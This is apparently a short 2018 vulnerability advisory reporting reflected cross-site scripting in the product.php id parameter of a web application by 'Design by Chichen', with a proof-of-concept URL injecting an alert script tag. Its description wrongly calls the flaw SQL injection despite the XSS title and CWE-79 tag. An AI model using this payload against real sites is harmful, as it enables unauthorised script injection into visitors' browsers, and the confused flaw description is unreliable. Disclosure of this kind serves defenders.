# Exploit Title: Cross Site Sripting in " Design by Chichen " #----------------------------------------------------------------------------------------- # Exploit Author: Mehdi Razmjoo ( razmjumehdi@gmail.com ) #----------------------------------------------------------------------------------------- # Date: 2018.4.29 #----------------------------------------------------------------------------------------- # Vendor Homepage: https://www.cct95.com #----------------------------------------------------------------------------------------- # CWE: CWE-79 #----------------------------------------------------------------------------------------- # Category: Web Application #----------------------------------------------------------------------------------------- #Dork: - #----------------------------------------------------------------------------------------- # Vulnerability Path: http://Server/product.php?id= #----------------------------------------------------------------------------------------- #Tested On: Kali Linux ( Firefox ) #----------------------------------------------------------------------------------------- # Description: # # The vulnerability allows an attacker to inject sql commands. An bad guy might injects commands on URL in this path: # # http://Server/product.php?id="><script>alert(1)</script> # #----------------------------------------------------------------------------------------- #